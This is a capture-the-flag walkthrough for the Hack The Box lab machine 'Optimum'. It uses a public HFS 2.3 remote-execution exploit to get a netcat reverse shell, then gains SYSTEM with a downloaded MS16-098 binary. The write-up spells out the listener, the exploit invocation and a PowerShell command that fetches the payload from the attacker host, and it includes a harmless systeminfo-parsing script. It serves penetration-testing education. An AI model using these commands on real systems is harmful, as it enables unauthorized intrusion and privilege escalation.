
Optimum // Windows // Beginner

created by ch4p // 10.10.10.8

// Enumeration //

As always, we’ll start with our initial scans. Generally I do a full port scan, but to save a bit of time I’m only scanning the first 1024 ports (-p 1-1024, not nmap’s --top-ports 1024) on this particular machine. Hint: there isn’t much.

nmap -Pn -A -p 1-1024 -v 10.10.10.8 -oG /home/rp/Desktop/Optimum/nmap

There’s only one service, HTTP on port 80, and nmap’s version scan identifies it as HttpFileServer (HFS) 2.3, a small Windows web-based file server. Let’s do a quick Google search on that banner and see if anything turns up.

The first two results are public exploits for a remote command execution bug in HFS 2.3.x. Seems like a likely path for us to follow. Let’s hit up searchsploit and mirror the first one (Exploit-DB 39161) to our desktop; searchsploit -m copies into the current working directory, so cd to the desktop first.

searchsploit -m 39161

The payloads inside the script are URL-encoded, but what it does boils down to three requests to the HFS search endpoint. The first saves a small VBScript to disk on the target, the second runs it with cscript.exe so the target reaches back to our HTTP server and downloads nc.exe, and the third executes nc.exe with the IP and port that are hardcoded near the top of the script (the ip_addr and local_port variables; edit both to match your VPN address and your listener before running it). We’ll be listening on our Kali machine on that port, and ideally we get a shell back. Make sure the HTTP server and the netcat listener are both running before you execute the script, and if nothing comes back, run it again; the Exploit-DB entry itself notes that it can take a couple of attempts. The following commands are in order. Separate groups of commands denote separate tabs.

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe ~/Desktop/nc.exe
cd ~/Desktop    # http.server serves the current directory, so nc.exe has to live here
sudo python3 -m http.server 80

nc -lvnp 2901    # must match local_port in 39161.py

sed -i 's/\r//g' 39161.py    # strip the CRLF line endings from the Exploit-DB copy
python2 39161.py 10.10.10.8 80    # the script imports urllib2, so it needs Python 2

Huzzah, we have a user shell. We can go ahead and grab the user flag from here, and then it’s time to escalate.

// Privilege Escalation //

Let’s start this off with a bit of situational awareness and find out what kind of environment we’re working in. The systeminfo command gives a lot of info at a glance (OS name and version, architecture, installed hotfixes), and after running it we can dial in our approach. After grabbing all that and jotting it in my notes (I recommend CherryTree), I’m going to pull in a tool to make my job easier: Windows Exploit Suggester. It’s somewhat unreliable, since it only compares the hotfix list against Microsoft’s bulletin spreadsheet, which stopped being updated in 2017, and it reports plenty of false positives, but it should work for this machine.

Copy the systeminfo output back to our attacker machine and run it through Windows Exploit Suggester. Put the text file with the system info in the same directory as the WES script.

./windows-exploit-suggester.py --update    # downloads the MSSB .xls into the current directory; WES needs Python 2 and the xlrd module
./windows-exploit-suggester.py --database 2020-07-06-mssb.xls --systeminfo Opt.txt    # use whatever filename --update just wrote

We get back a long list of candidate exploits for missing patches (the output runs well past what’s shown here).
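The part of WES that matters for triage is how it reads the systeminfo dump before comparing it against the bulletin database. The script below is an added example for this write-up, not WES’s own code: it parses the OS fields and the hotfix list from a constructed systeminfo dump, handles the UTF-16 file that Windows PowerShell’s > redirection produces (a common reason WES reports nothing for a pasted dump), and reports which bulletins have none of their KBs installed. The bulletin-to-KB mapping is caller supplied and the two bulletin names in the test are invented labels, not real Microsoft identifiers.

```python
#!/usr/bin/env python3
"""Parse a systeminfo dump the way Windows Exploit Suggester does before it compares
the host against the MSSB spreadsheet (added example, not WES code). The
bulletin-to-KB mapping is a placeholder supplied by the caller; WES derives it from
Microsoft's bulletin database.
"""
import re
import sys

# Constructed sample in systeminfo's own layout (trimmed; not a capture from the box).
SAMPLE = """\
Host Name:                 WEBSRV
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
"""

_FIELD = re.compile(r"^(OS Name|OS Version|System Type):\s+(.+?)\s*$")
_HOTFIX = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def decode_systeminfo(raw: bytes) -> str:
    """Decode the dump regardless of how it was redirected on the target.
    cmd.exe writes the OEM code page (ASCII for the fields we need); Windows
    PowerShell's > writes UTF-16LE with a BOM, which a naive reader sees as garbage."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_systeminfo(text: str) -> dict:
    """Return the OS fields plus the installed KB list, in file order."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            info[m.group(1)] = m.group(2)
            continue
        m = _HOTFIX.search(line)
        if m:
            info["hotfixes"].append(m.group(1).upper())
    return info


def missing_bulletins(info: dict, bulletin_kbs: dict) -> list:
    """Bulletins for which none of their delivering KBs is installed.
    bulletin_kbs maps a bulletin id to the set of KBs that ship its fix on this OS."""
    installed = set(info["hotfixes"])
    return sorted(b for b, kbs in bulletin_kbs.items() if not installed & set(kbs))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            text = decode_systeminfo(fh.read())
    else:
        text = SAMPLE
    info = parse_systeminfo(text)
    print(info.get("OS Name"), "|", info.get("OS Version"), "|", info.get("System Type"))
    print(len(info["hotfixes"]), "hotfixes installed")
```

Pass the path of your Opt.txt as the first argument to parse a real dump. The OS version and architecture are what decide which compiled exploit is usable, so read them off before trusting any suggestion from the hotfix comparison.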

So we shouldn’t have any issues getting SYSTEM. The exploit we’re going to focus on is MS16-098, an integer overflow in the win32k RGNOBJ handling; Exploit-DB 41020 is the version for Windows 8.1 / Server 2012 R2 x64, which matches what systeminfo reported. We can download a pre-compiled build from GitHub and use our same HTTP server to transfer it to the target.
On your attacker machine:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

And then from the exploited machine:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.23:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Run c:\Users\Public\Downloads\41020.exe from the nc shell and it spawns a cmd.exe running as SYSTEM. Now for the root flag.